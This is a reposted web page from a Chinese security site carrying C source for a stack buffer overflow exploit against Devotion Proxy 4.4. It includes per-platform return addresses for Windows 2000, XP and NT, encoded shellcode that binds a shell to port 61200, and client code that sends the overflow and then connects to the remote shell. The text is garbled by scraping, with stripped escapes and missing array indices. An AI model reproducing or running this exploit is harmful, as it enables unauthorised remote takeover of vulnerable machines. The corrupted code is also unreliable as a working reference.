| Devotion Proxy 4.4 Stack Overflow Exploit |
| 作者:YesHack.… 文章来源:YesHack.Com 更新时间:2006-4-18 8:13:49 【字体:小 大】 | ||
/* _ ___ _ _ _ _ __| |_ _ / __| | | _ _ (_)_ _| |__ __ _ ___ / _` | ’_| (_ |_ _| ’ | | || | ’_ / _` (_-< __,_|_| ___| |_||_||_|/ |_,_|_.__/__,_/__/ |__/ Presents.... Devotion Proxy 4.4 Stack Overflow Exploit Vulnerability discovered by drG4njubas[m00] Contacts: drG4njubas[at]bk.ru, http://m00.void.ru, #m00sec(@efnet) Greets to Over_G, D4rkGr3y, r4ShR4y, h0snp, ... Compile with m$Content$nbsp;visual c++: cl m00-devproxy.cpp */ #include <windows.h> #include <winsock.h> #include <stdio.h> #include <conio.h> #pragma comment (lib,"wsock32") struct{ char *platform; DWORD retaddr; //jmp esp } targets[]={ {"Windows 2000 SP1" , 0x77e3cb4c } , {"Windows 2000 SP2" , 0x77e2492b } , {"Windows 2000 SP3" , 0x77e2afc5 } , {"Windows 2000 SP4" , 0x77e14c29 } , {"Windows XP SP0" , 0x77f5801c }, {"Windows XP SP1" , 0x77e626ba }, {"Windows NT SP6" , 0x77f32935 }, NULL }; //Shellcode binds shell to a port 61200 //Download sources from www.m00.ru char shellcode[]= "xEBx0Fx58x80x30x92x40x81x38x6Dx30x30x21x75xF4" "xEBx05xE8xECxFFxFFxFFx7BxC6x93x92x92xCFxC7xA3" "x49xF6x19x91xD2x01x19xD1x6DxD2xE7x6Bx19xC1x91" "xF4xA3x40xF4x2Ax92x82xF4x13xA8xDFxC8xE6x95xBB" "x50x7Bx60x6Dx6Dx6Dx1Bx41x19xE8xAEx93x45x91xCD" "xEAx19xD9x8Ax19xE1xB2x19xE9xB6x93x44x93x45x6E" "x3Fx93x42x04x15x6FxC3xA3x5Bx12x53x9Dx61x34xE0" "x98x04xCBx15x6FxE6x80xD5xD5x70x74x2Cx9Dx92x92" "x92xBBx5CxBBx65x7Bx7Ax6Dx6Dx6DxA3x52xF4x19x95" "x53x72x90x19xE1x8Ex93x44x93x54x3Fx93x42x1Bx54" "x1Bx45xCFxC5x1Fx0Fx9Dx92x92x92xC1xC5x6Dx44x1F" "x0FxC1x92x92x92xC1x6Dx42x1Bx55x1Fx0FxC8x92x92" "x92xC1xC2x6Dx44xA3x5BxC3xC3xC3xC3xFAx93x92x92" "x92xFAx90x92x92x92x6Dx42x1Bx51x1Fx17xF7x92x92" "x92xC2xC5x6Dx44xFAx82x92x92x92x1Fx1FxEAx92x92" "x92xC3xC1x6Dx42x1Fx17xF8x92x92x92xC2xC5x6Dx44" "xFAx93x92x92x92xC1x6Dx42x1Fx17xE3x92x92x92xC2" "xC5x6Dx44xA3x5BxC3xC3xC1x6Dx42xCDxC2x1Fx0FxD5" "x92x92x92xC1xC5x6Dx44xFAx6Dx92x92x92xFAxD2x92" "x92x92x6Dx42x1Bx51x1Fx1FxBAx92x92x92xC3xC5x6D" "x44xC1x6Dx42xCAx1BxD1xD2x1BxD1xAEx1BxD1xAAx55" 
"xD1xBEx93x93x92x92x1Fx17xAAx92x92x92xC2xC5x6D" "x44xC1xC1xA3x5BxC3xC3xC3xFAx93x92x92x92xC3xC3" "x1Fx0Fx1Ex92x92x92xC1xC3x6Dx42x1Fx17x8Ex92x92" "x92xC2xC5x6Dx44x6Dx42x7Ax35x6Cx6Dx6DxD5xF7xE6" "xC2xE0xFDxF1xD3xF6xF6xE0xF7xE1xE1x92xDExFDxF3" "xF6xDExFBxF0xE0xF3xE0xEBxD3x92xD7xEAxFBxE6xC2" "xE0xFDxF1xF7xE1xE1x92xD5xF7xE6xC1xE6xF3xE0xE6" "xE7xE2xDBxFCxF4xFDxD3x92xD1xE0xF7xF3xE6xF7xC2" "xE0xFDxF1xF7xE1xE1xD3x92xD5xFExFDxF0xF3xFExD3" "xFExFExFDxF1x92xE5xE1xA0xCDxA1xA0x92xC5xC1xD3" "xC1xFDxF1xF9xF7xE6xD3x92xF0xFBxFCxF6x92xFExFB" "xE1xE6xF7xFCx92xF3xF1xF1xF7xE2xE6x92x90x92x7D" "x82x92x92x92x92x92x92x92x92x92x92x92x92x93x92" "x92x92xF1xFFxF6x92x6Dx30x30x21"; char jump[]= "x29x4cxe1x77" //retaddr "x90x90x90x90" "x90x90x90x90x90" "xE9xFCxF3xFFxFF"; char request[]= " /Proxy.dtl?URL=www.m00.ru HTTP/1.1rn" "Accept: */*rn" "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)rn" "Connection: Keep-Alivern" "Cookie: session-id=1rnrn"; void usage(); void have_fun(int sock); DWORD WINAPI recv_thread(LPVOID lpParam); void main(int argc, char **argv){ WSADATA wsaData; SOCKADDR_IN rmaddr; HOSTENT *addr; SOCKET sock,shell; DWORD tmp; char buf[100], exploit[4096+sizeof(jump)]; int i,t; printf("n*******************************************n"); printf(" Devotion Proxy buffer overflow exploit n"); printf(" Coded by drG4jubas[m00 Crew] n"); printf("*******************************************nn"); if(argc<4){ usage(); return; } t = atoi(argv[3]); i = 0; while(targets.platform)i++; if(t >= i){ printf("Bad targetn"); return; } memcpy(jump, &targets[t].retaddr, 4); for(i = 0; i < sizeof(exploit);i++)exploit = ’x90’; for(i =0; i < sizeof(shellcode)-1; i++)exploit[i+1038] = shellcode; memcpy(exploit+4096, jump, sizeof(jump)-1); WSAStartup(MAKEWORD(2,2), &wsaData); sock = socket(AF_INET, SOCK_STREAM, 0); addr = gethostbyname(argv[1]); if(addr != NULL)memcpy(&(rmaddr.sin_addr.s_addr), addr->h_addr_list[0], addr->h_length); else{ printf("Can not resolve host namen"); return; } 
rmaddr.sin_family = AF_INET; rmaddr.sin_port = htons(atoi(argv[2])); printf("Connecting to %s...", argv[1]); if(connect(sock,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ printf("failedn"); return; } printf("okn"); printf("Sending exploit..."); send(sock, exploit, sizeof(exploit), 0); send(sock, request, sizeof(request), 0); printf("donen"); CreateThread(NULL, 0 ,recv_thread, (LPVOID)sock, 0, &tmp); Sleep(100); shell = socket(AF_INET, SOCK_STREAM, 0); rmaddr.sin_port = htons(61200); if(connect(shell,(struct sockaddr *)&rmaddr,sizeof(rmaddr))){ printf("Exploitation failed:(n"); closesocket(sock); WSACleanup(); return; } printf("Congratulations!!! Shell spawned :Dnn"); have_fun(shell); closesocket(shell); closesocket(sock); WSACleanup(); return; } void usage(){ int i; printf("USAGE: "); printf("m00-devproxy.exe <host> <port> <platform>nn"); printf("Target platforms:n"); for(i =0; targets.platform; i++) printf("%d - %sn", i, targets.platform); } DWORD WINAPI recv_thread(LPVOID lpParam){ SOCKET sock; char buf[128]; sock = (SOCKET)lpParam; recv(sock, buf, 128, 0); return 0; } void have_fun(int sock){ char buf[1024]; int i; fd_set fdread; TIMEVAL time; time.tv_sec = 1; time.tv_usec = 0; do{ FD_ZERO(&fdread); FD_SET(sock, &fdread); i = select(0, &fdread, NULL, NULL, &time); if(i > 0){ int j = recv(sock, buf, 1024, 0); if(j == SOCKET_ERROR)break; buf[j] = ’’; printf("%s", buf); } if(kbhit()){ fgets(buf, 1024, stdin); send(sock, buf, strlen(buf), 0); if(buf[0] == ’r’){ buf[0] = ’n’; printf("%c",buf[0]); send(sock, buf, 1, 0); } } }while(i != SOCKET_ERROR); return; |